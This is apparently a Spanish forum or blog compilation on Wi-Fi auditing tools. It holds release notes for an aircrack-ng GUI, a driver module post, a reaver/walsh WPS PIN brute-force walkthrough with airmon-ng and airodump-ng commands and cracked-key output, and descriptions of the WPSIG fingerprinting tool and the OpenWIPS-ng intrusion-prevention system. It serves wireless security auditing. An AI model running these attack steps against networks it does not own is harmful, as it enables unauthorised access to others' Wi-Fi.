Gui para suite aircrack-ng

Autor: supremo12345

Version de testeo.
- updater deshabilitado

- logs incompletos

Si me podeis ayudar a comprobar las posibles dependencias me quitaria mucho tiempo. Porque yo solo tngo 3 S.O’s donde puedo probarlo: Mint, Wifiway, Debian. Y son de uso personal asique he instalado anteriormente paquetes que quizas requiera la aplicacion (como libs pcap y cosas asi).

Ademas asi los impacientes pueden probar el reaver xD.

Changelog

RECONSTRUIDO EL 50% DEL CODIGO. Mejora del rendimiento en aprox un 30%.
Ataque reaver implementado y optimizado
Reconstruidos TODOS LOS ATAQUES. Optimizacion extrema.
Interfaz airodump totalmente reconstruida.
Escaneo WPA habilitado
Creacion de hilo que controla los logs de la aplicacion
Librerias actualizadas
Decenas de bugs fixeados (aunque pueden aparecer otros xD)
Historical network almacena las sesiones salvadas de WPA con reaver
Updater actualizado: a partir de la version Beta1 siempre se podra actualizar desde la aplicacion
Reinyeccion arp x3 ipv6 [experimental]
Posibilidad de lanzar varias ataques con distintas interfaces a la misma AP
Autentificacion forzada [experimental]

http://code.google.com/p/aircrackgui-m4/downloads/list

………………………………………..

Version final liberada  Cheesy.
Tamaño del paquete reducido un 80% (antes, 32 MiB, ahora, 6.6 MiB). Con las librerias incluidas.

0.7.0 Final WEP Edition
*******************************************
[spa]
Es *NECESARIO* descargar el paquete completo
desde la pagina de googlecode.
http://code.google.com/p/aircrackgui-m4/
Si actualizas a esta version desde una previa,
llegaras a la version 0.6.8 RC, no a la 0.7.0 Final.
[eng]
Its *NECESSARY* to download complete
packet from googlecode page.
http://code.google.com/p/aircrackgui-m4/
If you update from previous version,
you will get version 0.6.8 RC, not 0.7.0 Final.
*******************************************
* Libs Updated
* Segmentation fault fixed in some systems (due to updating libs)
* DEBUG MODE COMPLETELY BUILD! (option -d when launch the program)
* Export keys added in historicalNetwork
* Added start script to project svn
* Modified start script. Now is more powerfull
* Some optimizations

12 marzo de 2012

example version 0.6.0 RC [del usuario sanson]:

Atheros en Wifiway con canales 12-13 desbloqueados y con control de TX power

Se ha encontrado la solución, al problema que presentaba muchos adaptadores wireless, con Atheros en sus entrañas y que impedía que estos adaptadores usb pudieran auditar en los canales 12 y 13, ya que sus drivers no lo permitían.

También se ha conseguido solucionar el inconveniente, de no poder manejara el TX power a nuestro antojo.

Todo esto a sido llevado a cabo, por el que se esta convirtiendo en el alma mater de wifiway. USUARIONUEVO (manda carallo el nick  Evil)  en otro alarde de trabajo y perseverancia ha conseguido realizar un modulo, con el que podremos auditar y navegar en los canales mencionados, así como manejar el Power para poder sacar toda la potencia que tienen estos adaptadores.

En la pruebas realizadas se ha conseguido poner una wifistation ext AR9271, ha un rate de inyección máxima, de nada menos que 680 datas/seg. Y una inyección mantenida de 550 datas/seg.

podréis encontrar el modulo .xzm Aquí

que lo disfrutéis. Como siempre mas info en SeguridadWireless.net

sanson

wifistation interior TEST 2 , este podria ser el modulo final.

bien , ya sabemos que la podemos hacer funcionar.

el test que salio bien SOLO contenia 1 DRIVER ,. y ademas estropeaba las opciones de arrancar los drivers de ati o nvidia , y eso no es permisible..¿verdad?

BIEN , os dejo otro test , ESTE ES INFINITAMENTE MEJOR ,  tenemos TOOOODOS los drivers wireless …actualizados a fecha DE HOY  ,, SI SI DE HOY MISMO.

y ademas este no afecta a los drivers ati ni navidia..asiq ue si con este las wifistation interior funcionan..seria el modulo colgado como oficial ,para hacerlas funcionar.

cargar wifiway 3.4 , con este modulo extra….dejando fuera el otro que ya la hacia funcionar , ¿ok?.

necesito saber que con este os funciona bien..que ademas ya os digo ..todos los drivers wifi actualizados y ademas no daña el resto de funcionalidades de wifiway (gpu-cracking)

GRACIAS A LOS BETATESTERS.

www.downloadwireless.net/test/compat-wireless-2012-02-01-TEST-2.xzm

Ejemplo de reaver en wifiway

Autores: ChimoC $ Garcad

Reaver lo podeis descargar aqui http://code.google.com/p/reaver-wps/downloads/list o bien usarlo con wifiway (que ya lo lleva incorporado)

1.- Walsh –> Lo que hará es detectar qué APs pudiesen ser vulnerables

Walsh v1.3

Required Arguments:
-i, –interface=<iface> Interface to capture packets on
-f, –file [FILE1 FILE2 FILE3 ...] Read packets from capture files

Optional Arguments:
-c, –channel=<num> Channel to listen on [auto]
-o, –out-file=<file> Write data to file
-n, –probes=<num> Maximum number of probes to send to each AP in scan mode [15]
-C, –ignore-fcs Ignore frame checksum errors
-5, –5ghz Use 5GHz 802.11 channels
-s, –scan Use scan mode
-u, –survey Use survey mode [default]
-h, –help Show help

Ejemplo de uso: walsh -i mon0

Scanning for supported APs…

00:19:15:XXXXXXXX WLAN_5XXX
00:19:15:XXXXXXXX WLAN_3XXX
X0:21:B7:XXXXXXXX XXXXXXXXX
64:68:0C:XXXXXXXX WLAN_XXXX
C4:3D:C7:XXXXXXXX ONOXXX

Lo debeis parar con control+c

2.- reaver: Sirve para lanzar los PINS e ir probando. Puede llegar a tardar muchas horas (como 11 que tardé yo, por ejemplo)

Uso: reaver -i mon0 -b C4:3D:C7:XXXXXXXX -vv

Resultado

94.67% complete @ 2012-01-08 08:34:36 (4 seconds/attempt)

  • WPS PIN: ’5XXXXXXX’
  • WPA PSK: ’1XXXXXXXXX’
  • AP SSID: ‘ONOXXXX’

Así que ya sabeis que debeis deshabilitar el WPS de vuestro router

Un saludo

ChimoC

P.D.: Si tecleais

reaver –man

Os saldrán más cosillas

Ejemplo de Garcad:

Se puede usar el binario de walsh 1.3 en wifiway 3.4 perfectamente desde el directorio por ejemplo /root al mismo tiempo que tener instalada la version 1.4

Para los que les quede duda, mas rapido en mi caso imposible 5 segundos.

Código:
Reaver v1.4 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>

[+] Waiting for beacon from XX:XX:XX:XX:XX:XX
[+] Switching mon0 to channel 1
[+] Associated with XX:XX:XX:XX:XX:XX (ESSID: XXXX)
[+] Trying pin XXXXXXXX
[+] Sending EAPOL START request
[+] Sending identity response
[+] Sending M2 message
[+] Sending M4 message
[+] Sending M6 message
[!] WPS transaction failed, re-trying last pin
[+] Key cracked in 5 seconds
[+] WPS PIN: 'XXXXXXXX'
[+] WPA PSK: 'nXXXXXXXXXXXXXX0'
[+] AP SSID: 'XXXXXXXX'
[+] Nothing done, nothing to save.

Yo el proceso lo hago del siguiente modo.

Pongo en modo monitor el adaptador

Código:
# airmon-ng start wlan0

Me crea un clon mon0

Necesito saber el canal que emite mi router por lo que utilizo el siguiente comando para capturar el trafico con airodump-ng y visualizar el canal

Código:
# airodump-ng mon0

Cuando se en el canal que emite, cierro la ventana y sigo con…

Código:
# airodump-ng mon0 -w wps-test --beacons --chanel NUMERO --bssid ELQUETENGO

Cuando termina el proceso de capturar abrimos con Wireshark el archivo wps-test.cab.

Yo ya se que lo tengo activado, pero como han explicado como mirarlo con Wireskark sigo con el mismo rol.

Buscamos un broadcast de nuestro router como se puede ver en la siguiente imagen.

Localizamos WPS y si esta activo o no lo esta.

Si Wifi Protected Setup visualizamos 0×02 esta activo se puede mirar si es vulnerable, si vemos 0×01 esta en modo manual, desactivado.

Como esta activada la protección con Wireskark en el archivo *.cap podemos ver 0×02 puedo empezar el ataque con el reaver.

Código:
# reaver -i mon0 -b BSSIDELQUETENGAS -c ELCANLAQUEEMITES -e ESSIDELQUETENGAS -d 15 -vv

 

WPSIG

Fuente original: corelabs.coresecurity.com

What is WPSIG?

It’s a simple tool (written in Python) that does information gathering using WPS information elements. WPS or Wi-Fi Protected Setup is a standard created by the Wi-Fi Alliance that allows the users to setup the security of a Wireless AP in a simple way.

Wireless APs supporting WPS discloses enough information to fully fingerprint it using only 1 probe request frame.

The following information can be obtained using this method:

  • Device Name
  • Model Number and Name
  • Manufacturer
  • Serial Number of the device

Requirements

Source Code

Source is available here.

Usage

Using WPSIG is straightforward,

Wi-Fi Protected Setup Information Gathering. Usage: WPSIG.py -i interface -w filename Options: -h, --help show this help message and exit -i IFACE, --interface=IFACE network interface where to sniff. -w FILENAME, --write=FILENAME output filename. -s SOURCE, --source=SOURCE source mac address of the probe request frames.

e.g. WPSIG on interface wlan0,

root@unknow:~# ./wpsig.py --interface wlan0 Wi-Fi Protected Setup Information Gathering. Press Ctrl+C to stop. Sniffing... -------------------------------------------------------------------------------- [00:22:6B:55:99:88] - 'xxxxxx' - 'Cisco-Linksys, LLC' WPS Information * Device Name: 'Wireless-G Router' * Wi-Fi Protected Setup State: 'Not Configured' * UUID-E: 'xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx' * Response Type: 'AP' * Primary Device Type: 'Network Infrastructure - AP' * Model Number: 'WRT54G2' * Serial Number: 'CSV01Hxxxxxxx' * Version: '1.0' * Model Name: 'Router' * Config Methods: 'Display, PushButton' * Manufacturer: 'Linksys' -------------------------------------------------------------------------------- ^C Ctrl+C caught. Closing... root@unknow:~#

Licensing

WPSIG is released under version 3 of the GNU General Public License.

Description

Title
WPSIG
Release date
2010-06-18
License type
GPLv3

Attachments

wpsig.zip – Wpsig v1 – md5: 9dbc8b176e0990c8debc9aed07fee9bf

Related information

Researchers

Tools

OpenWIPS-ng

Fuente: openwips-ng.org

OpenWIPS-ng es open-source y modular Wireless IPS (Intrusion Prevention System). Se compone de tres partes:

Sensor (s): “Dumb”, dispositivos que capturan el tráfico inalámbrico y lo envian al servidor para su análisis. También responde a los ataques.
Servidor: Agregados los datos de todos los sensores, analizar y responder a los ataques. También registra y alerta en caso de un ataque.
Interfaz: interfaz gráfica de usuario para administrar el servidor y mostrar información sobre las amenazas de la red inalámbrica (s).

Descarga: openwips-ng-0.1beta1.tar.gz

Videos: